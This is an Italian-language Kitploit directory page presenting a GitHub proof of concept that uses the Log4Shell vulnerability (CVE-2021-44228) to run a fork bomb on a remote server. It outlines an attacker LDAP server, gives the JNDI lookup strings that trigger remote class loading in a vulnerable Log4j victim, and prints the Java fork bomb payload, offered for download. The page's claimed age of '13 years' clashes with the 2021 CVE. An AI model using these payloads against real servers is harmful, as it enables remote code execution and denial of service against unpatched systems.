Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-exploit-fork-bomb — 💣💥💀 Prova di concetto: esempio di lancio di una fork bomb su un server remoto grazie alla vulnerabilità CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/funcid/log4j-exploit-fork-bomb
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlSviluppo Payload
GitHubfuncid/log4j-exploit-fork-bomb

log4j-exploit-fork-bomb

💣💥💀 Prova di concetto: esempio di lancio di una fork bomb su un server remoto grazie alla vulnerabilità CVE-2021-44228

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4j-exploit-with-fork-bomb

💣💥💀 Prova di concetto: esempio di lancio di una fork bomb su un server remoto grazie alla vulnerabilità CVE-2021-44228

  1. Creiamo il server LDAP dell'attaccante (modulo server), che fornirà rappresentazioni di stringhe e codice (modulo payload)

  2. Creiamo un esempio di vittima (modulo victim) e passiamo a Log4j la stringa Versione JRE <= 6u211, 7u201, 8u191 e 11.0.1

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
  1. L'applicazione vittima riceverà dal server dell'attaccante un array di byte e li interpreterà come stringa da sostituire o come codice eseguibile (parametro com.sun.jndi.ldap.object.trustURLCodebase = true)

  2. Per esempio, il codice eseguibile sarà una fork bomb (un programma che lancia le proprie copie, saturando tutto il tempo della CPU)

root@kitploit:~
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
Scarica lo strumento